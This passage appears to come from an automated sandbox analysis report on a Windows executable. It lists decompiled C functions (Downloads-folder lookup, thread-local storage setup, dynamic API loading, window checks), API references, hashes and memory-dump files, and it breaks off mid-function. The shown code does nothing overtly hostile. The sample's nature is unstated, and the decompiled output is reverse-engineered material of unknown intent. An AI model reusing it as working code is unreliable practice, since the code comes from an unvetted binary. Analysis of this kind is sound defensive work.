                                                                                                                                                                      0x00406480
                                                                                                                                                                      0x004064f3
                                                                                                                                                                      0x004064f3
                                                                                                                                                                      0x004064f7
                                                                                                                                                                      0x004064fa
                                                                                                                                                                      0x004064fe
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00406500
                                                                                                                                                                      0x00406502
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00406504
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00406504
                                                                                                                                                                      0x00406502
                                                                                                                                                                      0x00406574
                                                                                                                                                                      0x00406579
                                                                                                                                                                      0x0040657c
                                                                                                                                                                      0x00406581
                                                                                                                                                                      0x00406581
                                                                                                                                                                      0x00406589
                                                                                                                                                                      0x0040658f
                                                                                                                                                                      0x00406594
                                                                                                                                                                      0x00406594
                                                                                                                                                                      0x0040659c
                                                                                                                                                                      0x004065a2
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004065a7
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00406480
                                                                                                                                                                      0x00406472
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00406485
                                                                                                                                                                      0x00406485
                                                                                                                                                                      0x00406488
                                                                                                                                                                      0x0040648d
                                                                                                                                                                      0x0040648d
                                                                                                                                                                      0x00406464
                                                                                                                                                                      0x00406491
                                                                                                                                                                      0x00406495
                                                                                                                                                                      0x00406497
                                                                                                                                                                      0x004064a0
                                                                                                                                                                      0x004064a0
                                                                                                                                                                      0x004064a3
                                                                                                                                                                      0x004064a6
                                                                                                                                                                      0x004064c0
                                                                                                                                                                      0x004064c4
                                                                                                                                                                      0x00406509
                                                                                                                                                                      0x00406510
                                                                                                                                                                      0x00406518
                                                                                                                                                                      0x0040651d
                                                                                                                                                                      0x00406521
                                                                                                                                                                      0x00406524
                                                                                                                                                                      0x0040652b
                                                                                                                                                                      0x0040652b
                                                                                                                                                                      0x0040652d
                                                                                                                                                                      0x00406533
                                                                                                                                                                      0x00406537
                                                                                                                                                                      0x00406557
                                                                                                                                                                      0x0040655a
                                                                                                                                                                      0x0040655d
                                                                                                                                                                      0x00406560
                                                                                                                                                                      0x00406539
                                                                                                                                                                      0x0040653e
                                                                                                                                                                      0x004065ba
                                                                                                                                                                      0x004065be
                                                                                                                                                                      0x004065c3
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00406540
                                                                                                                                                                      0x00406540
                                                                                                                                                                      0x00406547
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00406549
                                                                                                                                                                      0x0040654c
                                                                                                                                                                      0x00406550
                                                                                                                                                                      0x00406555
                                                                                                                                                                      0x004065c5
                                                                                                                                                                      0x004065ce
                                                                                                                                                                      0x004065d3
                                                                                                                                                                      0x004065d7
                                                                                                                                                                      0x004065da
                                                                                                                                                                      0x004065dd
                                                                                                                                                                      0x004065de
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00406555
                                                                                                                                                                      0x00406547
                                                                                                                                                                      0x0040653e
                                                                                                                                                                      0x00406563
                                                                                                                                                                      0x00406566
                                                                                                                                                                      0x0040656b
                                                                                                                                                                      0x0040656f
                                                                                                                                                                      0x00406571
                                                                                                                                                                      0x004064c6
                                                                                                                                                                      0x004064c6
                                                                                                                                                                      0x004064c8
                                                                                                                                                                      0x004064d0
                                                                                                                                                                      0x004064d0
                                                                                                                                                                      0x004064d3
                                                                                                                                                                      0x004064d6
                                                                                                                                                                      0x004064db
                                                                                                                                                                      0x004064e0
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040634e
                                                                                                                                                                      0x00406350
                                                                                                                                                                      0x004065b1
                                                                                                                                                                      0x004065b1
                                                                                                                                                                      0x00406356
                                                                                                                                                                      0x00406356
                                                                                                                                                                      0x0040635c
                                                                                                                                                                      0x0040636b
                                                                                                                                                                      0x0040636e
                                                                                                                                                                      0x00406373
                                                                                                                                                                      0x00406380
                                                                                                                                                                      0x00406393
                                                                                                                                                                      0x00406395
                                                                                                                                                                      0x0040639a
                                                                                                                                                                      0x004063ba
                                                                                                                                                                      0x004063bd
                                                                                                                                                                      0x0040639c
                                                                                                                                                                      0x004063a5
                                                                                                                                                                      0x004063aa
                                                                                                                                                                      0x004063ae
                                                                                                                                                                      0x004063b1
                                                                                                                                                                      0x004063b4
                                                                                                                                                                      0x004063b5
                                                                                                                                                                      0x004063b5
                                                                                                                                                                      0x004063c4
                                                                                                                                                                      0x004063c8
                                                                                                                                                                      0x004063cc
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004063d5
                                                                                                                                                                      0x004063d5
                                                                                                                                                                      0x004063d5
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x004063cc
                                                                                                                                                                      0x00406380
                                                                                                                                                                      0x00406373
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040635c
                                                                                                                                                                      0x00406350
                                                                                                                                                                      0x00000000

                                                                                                                                                                      APIs
                                                                                                                                                                      • wcsncpy.MSVCRT ref: 004063A5
                                                                                                                                                                        • Part of subcall function 0040E180: TlsGetValue.KERNEL32(0000001B,?,?,00405E65,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000), ref: 0040E18A
                                                                                                                                                                      • _wcsdup.MSVCRT ref: 004063EE
                                                                                                                                                                      • _wcsdup.MSVCRT ref: 00406409
                                                                                                                                                                      • _wcsdup.MSVCRT ref: 0040642C
                                                                                                                                                                      • wcsncpy.MSVCRT ref: 00406518
                                                                                                                                                                      • free.MSVCRT(?), ref: 0040657C
                                                                                                                                                                      • free.MSVCRT(?), ref: 0040658F
                                                                                                                                                                      • free.MSVCRT(?), ref: 004065A2
                                                                                                                                                                      • wcsncpy.MSVCRT ref: 004065CE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcsdupfreewcsncpy$Value
                                                                                                                                                                      • String ID: $ A$$ A$$ A
                                                                                                                                                                      • API String ID: 1554701960-2077024048
                                                                                                                                                                      • Opcode ID: 81cbbaf9a2bb25f669f5b054791e3fa14d7c6e9058cb5600c4bd8963ee11386a
                                                                                                                                                                      • Instruction ID: ef8ff848e519ff80595976f88fda9aa54c27a9e0628953f57c1371388918df2b
                                                                                                                                                                      • Opcode Fuzzy Hash: 81cbbaf9a2bb25f669f5b054791e3fa14d7c6e9058cb5600c4bd8963ee11386a
                                                                                                                                                                      • Instruction Fuzzy Hash: 70A1BD71504301AFCB209F18C88166BB7B1EF94348F05093EFD86A7395E77AD925CB9A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040A7DA, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 91libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 58%
                                                                                                                                                                      			E0040A7DA(void* __eflags, char _a8) {
				signed int _v4;
				wchar_t* _v8;
				signed int _t11;
				int _t14;
				_Unknown_base(*)()* _t18;
				int _t23;
				struct HINSTANCE__* _t24;
				wchar_t* _t26;
				int _t27;
				void* _t31;

				_t27 = 0;
				_t26 = E0040E200(0x104, _a8);
				_t11 = _v4;
				if(_t11 != 2) {
					if(_t11 > 9) {
						L20:
						E0040E350(_t25, 0x104 - _t27);
						 *((short*)(_t26 + _t27 * 2)) = 0;
						return 0;
					}
					switch( *((intOrPtr*)(_t11 * 4 +  &M0040A8D2))) {
						case 0:
							L18:
							_t14 = E0040A90C(_t28, _t26);
							L19:
							_t27 = _t14;
							goto L20;
						case 1:
							_push(0x26);
							goto L17;
						case 2:
							goto L20;
						case 3:
							_push(5);
							goto L17;
						case 4:
							_push(0x1a);
							goto L17;
						case 5:
							_push(0x23);
							goto L17;
						case 6:
							_push(0xe);
							goto L17;
						case 7:
							_push(0xd);
							goto L17;
						case 8:
							_push(0x27);
							goto L17;
						case 9:
							_push(0x2e);
							L17:
							_pop(_t28);
							goto L18;
					}
				}
				_t24 = LoadLibraryW(L"Shell32.DLL");
				if(_t24 == 0) {
					L6:
					E0040A90C(0x28, _t26);
					wcscat(_t26, L"Downloads\\");
					_t14 = wcslen(_t26);
					goto L19;
				}
				_t18 = GetProcAddress(_t24, "SHGetKnownFolderPath");
				 *0x4170f8 = _t18;
				if(_t18 != 0) {
					_t25 =  &_a8;
					_push( &_a8);
					_push(0);
					_push(0);
					_push(0x41611c);
					if( *_t18() == 0) {
						wcscpy(_t26, _v8);
						wcscat(_t26, "\\");
						_t23 = wcslen(_t26);
						_t31 = _t31 + 0x14;
						_t27 = _t23;
						__imp__CoTaskMemFree(_v8);
					}
				}
				FreeLibrary(_t24);
				if(_t27 != 0) {
					goto L20;
				} else {
					goto L6;
				}
			}













                                                                                                                                                                      0x0040a7e7
                                                                                                                                                                      0x0040a7ef
                                                                                                                                                                      0x0040a7f1
                                                                                                                                                                      0x0040a7f8
                                                                                                                                                                      0x0040a88c
                                                                                                                                                                      0x0040a8bd
                                                                                                                                                                      0x0040a8c0
                                                                                                                                                                      0x0040a8c7
                                                                                                                                                                      0x0040a8cf
                                                                                                                                                                      0x0040a8cf
                                                                                                                                                                      0x0040a88e
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040a8b4
                                                                                                                                                                      0x0040a8b6
                                                                                                                                                                      0x0040a8bb
                                                                                                                                                                      0x0040a8bb
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040a895
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040a899
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040a89d
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040a8a1
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040a8a5
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040a8a9
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040a8ad
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040a8b1
                                                                                                                                                                      0x0040a8b3
                                                                                                                                                                      0x0040a8b3
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040a88e
                                                                                                                                                                      0x0040a809
                                                                                                                                                                      0x0040a80d
                                                                                                                                                                      0x0040a86b
                                                                                                                                                                      0x0040a86e
                                                                                                                                                                      0x0040a879
                                                                                                                                                                      0x0040a87f
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040a884
                                                                                                                                                                      0x0040a815
                                                                                                                                                                      0x0040a81b
                                                                                                                                                                      0x0040a822
                                                                                                                                                                      0x0040a824
                                                                                                                                                                      0x0040a828
                                                                                                                                                                      0x0040a829
                                                                                                                                                                      0x0040a82a
                                                                                                                                                                      0x0040a82b
                                                                                                                                                                      0x0040a834
                                                                                                                                                                      0x0040a83b
                                                                                                                                                                      0x0040a846
                                                                                                                                                                      0x0040a84c
                                                                                                                                                                      0x0040a851
                                                                                                                                                                      0x0040a854
                                                                                                                                                                      0x0040a85a
                                                                                                                                                                      0x0040a85a
                                                                                                                                                                      0x0040a834
                                                                                                                                                                      0x0040a861
                                                                                                                                                                      0x0040a869
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040E200: TlsGetValue.KERNEL32(0000001B,00001000,00000000,00000000), ref: 0040E20C
                                                                                                                                                                        • Part of subcall function 0040E200: RtlReAllocateHeap.NTDLL(02370000,00000000,?,?), ref: 0040E267
                                                                                                                                                                      • LoadLibraryW.KERNEL32(Shell32.DLL,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040A803
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040A815
                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A83B
                                                                                                                                                                      • wcscat.MSVCRT ref: 0040A846
                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A84C
                                                                                                                                                                      • CoTaskMemFree.OLE32(?,00000000,00000000,?,02379F50,00000000,00000000), ref: 0040A85A
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,004046B8,00000000), ref: 0040A861
                                                                                                                                                                      • wcscat.MSVCRT ref: 0040A879
                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A87F
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeLibrarywcscatwcslen$AddressAllocateHeapLoadProcTaskValuewcscpy
                                                                                                                                                                      • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                                                                                                                                                                      • API String ID: 1878685483-287042676
                                                                                                                                                                      • Opcode ID: d8047ec1b211d1abfdd77f67eb398c2beda1c06acf7c2fe8683d516af209cf70
                                                                                                                                                                      • Instruction ID: a59125e26d23ccb30f5fa0f47659a7dbf798ada992acc4f36018911529e702ca
                                                                                                                                                                      • Opcode Fuzzy Hash: d8047ec1b211d1abfdd77f67eb398c2beda1c06acf7c2fe8683d516af209cf70
                                                                                                                                                                      • Instruction Fuzzy Hash: 0D210A32244301B6E11037A2AD4AF6B3A68CB41B94F10843BFD01B51C1D6BC897696AF
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00411D62, Relevance: 19.6, APIs: 13, Instructions: 74memoryregistrythreadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 90%
                                                                                                                                                                      			E00411D62(intOrPtr _a4, intOrPtr _a8) {
				void* _t11;
				void** _t12;
				void* _t13;
				void* _t14;
				void* _t20;
				void* _t24;
				HANDLE* _t25;

				if( *0x417678 == 0) {
					 *0x417698 = TlsAlloc();
					InitializeCriticalSection(0x417680);
					 *0x417678 = 1;
				}
				_t20 = TlsGetValue( *0x417698);
				if(_t20 != 0) {
					L7:
					_t11 = HeapAlloc( *0x417008, 0, 0xc);
					if(_t11 != 0) {
						 *((intOrPtr*)(_t11 + 4)) = _a4;
						 *((intOrPtr*)(_t11 + 8)) = _a8;
						 *_t11 =  *(_t20 + 8);
						 *(_t20 + 8) = _t11;
						return _t11;
					}
				} else {
					_t11 = HeapAlloc( *0x417008, 8, 0x14);
					_t20 = _t11;
					if(_t20 != 0) {
						EnterCriticalSection(0x417680);
						_t12 =  *0x41767c; // 0x0
						if(_t12 != 0) {
							 *_t12 = _t20;
						}
						 *(_t20 + 4) = _t12;
						 *0x41767c = _t20;
						LeaveCriticalSection(0x417680);
						_t25 = _t20 + 0x10;
						_t13 = GetCurrentProcess();
						_t14 = GetCurrentThread();
						DuplicateHandle(GetCurrentProcess(), _t14, _t13, _t25, 0x100000, 0, 0);
						_t3 = _t20 + 0xc; // 0xc
						__imp__RegisterWaitForSingleObject(_t3,  *_t25, E00411E5A, _t20, 0xffffffff, 8, _t24);
						TlsSetValue( *0x417698, _t20);
						goto L7;
					}
				}
				return _t11;
			}










                                                                                                                                                                      0x00411d70
                                                                                                                                                                      0x00411d79
                                                                                                                                                                      0x00411d7e
                                                                                                                                                                      0x00411d84
                                                                                                                                                                      0x00411d84
                                                                                                                                                                      0x00411d9a
                                                                                                                                                                      0x00411d9e
                                                                                                                                                                      0x00411e2b
                                                                                                                                                                      0x00411e35
                                                                                                                                                                      0x00411e3d
                                                                                                                                                                      0x00411e43
                                                                                                                                                                      0x00411e4a
                                                                                                                                                                      0x00411e50
                                                                                                                                                                      0x00411e52
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00411e52
                                                                                                                                                                      0x00411da4
                                                                                                                                                                      0x00411dae
                                                                                                                                                                      0x00411db4
                                                                                                                                                                      0x00411db8
                                                                                                                                                                      0x00411dbf
                                                                                                                                                                      0x00411dc5
                                                                                                                                                                      0x00411dcc
                                                                                                                                                                      0x00411dce
                                                                                                                                                                      0x00411dce
                                                                                                                                                                      0x00411dd2
                                                                                                                                                                      0x00411dd5
                                                                                                                                                                      0x00411ddb
                                                                                                                                                                      0x00411de7
                                                                                                                                                                      0x00411df4
                                                                                                                                                                      0x00411df7
                                                                                                                                                                      0x00411e01
                                                                                                                                                                      0x00411e13
                                                                                                                                                                      0x00411e17
                                                                                                                                                                      0x00411e24
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00411e2a
                                                                                                                                                                      0x00411db8
                                                                                                                                                                      0x00411e57

                                                                                                                                                                      APIs
                                                                                                                                                                      • TlsAlloc.KERNEL32(?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 00411D72
                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(00417680,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 00411D7E
                                                                                                                                                                      • TlsGetValue.KERNEL32(?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004), ref: 00411D94
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000008,00000014,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00411DAE
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00417680,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000), ref: 00411DBF
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00417680,?,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00411DDB
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000), ref: 00411DF4
                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 00411DF7
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,?,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00411DFE
                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00411E01
                                                                                                                                                                      • RegisterWaitForSingleObject.KERNEL32 ref: 00411E17
                                                                                                                                                                      • TlsSetValue.KERNEL32(00000000,?,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00411E24
                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000,0000000C,?,?,0040DFB8,0040DF20,00000000,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000), ref: 00411E35
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 298514914-0
                                                                                                                                                                      • Opcode ID: bdee7e9acd0791c466288ec044d2aaab850532c309e9e3b615f344bc37c153a3
                                                                                                                                                                      • Instruction ID: 8d0ee0ed933d17ffb5573716605f6a27c21e7768710c452de208be154d108613
                                                                                                                                                                      • Opcode Fuzzy Hash: bdee7e9acd0791c466288ec044d2aaab850532c309e9e3b615f344bc37c153a3
                                                                                                                                                                      • Instruction Fuzzy Hash: 91210770645301EFDB109FA4FC88B963B7AFB08761F11C43AFA059A2A5DB74D840CB68
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040D9E3, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 53librarysleeploaderCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                                      			E0040D9E3(void* __ecx, LONG* _a4, intOrPtr _a8) {
				char _v8;
				struct HINSTANCE__* _t5;
				long _t7;
				int _t9;
				_Unknown_base(*)()* _t10;
				void* _t13;
				struct HINSTANCE__* _t18;
				LONG* _t21;

				_t13 = 0;
				_t5 = LoadLibraryW( &M00412700);
				_t21 = _a4;
				_t18 = _t5;
				if(_t18 == 0) {
					L4:
					_t7 = InterlockedCompareExchange(_t21, 1, 0);
					if(_t7 == 0) {
						_a8();
						_t9 = InterlockedExchange(_t21, 2);
					} else {
						_t9 = _t7 - 1;
						if(_t9 == 0) {
							while( *_t21 != 2) {
								Sleep(0);
							}
						}
					}
				} else {
					_t10 = GetProcAddress(_t18, "InitOnceExecuteOnce");
					if(_t10 != 0) {
						 *_t10(_t21, E0040D9C3, _a8,  &_v8);
						_t13 = 1;
					}
					_t9 = FreeLibrary(_t18);
					if(_t13 == 0) {
						goto L4;
					}
				}
				return _t9;
			}











                                                                                                                                                                      0x0040d9ef
                                                                                                                                                                      0x0040d9f1
                                                                                                                                                                      0x0040d9f7
                                                                                                                                                                      0x0040d9fa
                                                                                                                                                                      0x0040d9fe
                                                                                                                                                                      0x0040da2b
                                                                                                                                                                      0x0040da36
                                                                                                                                                                      0x0040da39
                                                                                                                                                                      0x0040da4f
                                                                                                                                                                      0x0040da55
                                                                                                                                                                      0x0040da3b
                                                                                                                                                                      0x0040da3b
                                                                                                                                                                      0x0040da3c
                                                                                                                                                                      0x0040da48
                                                                                                                                                                      0x0040da42
                                                                                                                                                                      0x0040da42
                                                                                                                                                                      0x0040da4d
                                                                                                                                                                      0x0040da3c
                                                                                                                                                                      0x0040da00
                                                                                                                                                                      0x0040da06
                                                                                                                                                                      0x0040da0e
                                                                                                                                                                      0x0040da1d
                                                                                                                                                                      0x0040da1f
                                                                                                                                                                      0x0040da1f
                                                                                                                                                                      0x0040da21
                                                                                                                                                                      0x0040da29
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040da29
                                                                                                                                                                      0x0040da61

                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00000000,00000000,00000004,00000000,0040D7F5,00417614,0040D982,00000000,FFFFFFED,00000200,77E34620,00409E16,FFFFFFED,00000010), ref: 0040D9F1
                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040DA06
                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DA21
                                                                                                                                                                      • InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 0040DA30
                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DA42
                                                                                                                                                                      • InterlockedExchange.KERNEL32(00000000,00000002), ref: 0040DA55
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
                                                                                                                                                                      • String ID: InitOnceExecuteOnce$Kernel32.dll
                                                                                                                                                                      • API String ID: 2918862794-1339284965
                                                                                                                                                                      • Opcode ID: 6d048d891e2cf8fbf7d8d619f0fa725de381c314969143a28184dc53c1081fbd
                                                                                                                                                                      • Instruction ID: 78d57fd6bf002b5b6c2ef9560121a390c40c5b5e23dd256736785be4ed7191ec
                                                                                                                                                                      • Opcode Fuzzy Hash: 6d048d891e2cf8fbf7d8d619f0fa725de381c314969143a28184dc53c1081fbd
                                                                                                                                                                      • Instruction Fuzzy Hash: 0E01D431B14204BBD7102FE4AC49FEB3B29EB86B12F11803AF505A11C4DB788909CA6D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004094A7, Relevance: 12.0, APIs: 8, Instructions: 50threadwindowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E004094A7(struct HWND__* _a4) {
				long _t8;
				struct HWND__* _t23;
				intOrPtr* _t25;

				_t23 = _a4;
				_t8 = GetWindowThreadProcessId(_t23, 0);
				if(_t8 == GetCurrentThreadId() && IsWindowVisible(_t23) != 0) {
					_t25 = E0040DB12(0x4170e4, 0x14);
					 *(_t25 + 4) = _t23;
					 *_t25 = GetCurrentThreadId();
					 *((short*)(_t25 + 8)) = 0;
					if((GetWindowLongW(_t23, 0xffffffec) & 0x00000008) != 0) {
						 *((char*)(_t25 + 8)) = 1;
					}
					if(_t23 != GetForegroundWindow() && IsWindowEnabled(_t23) != 0) {
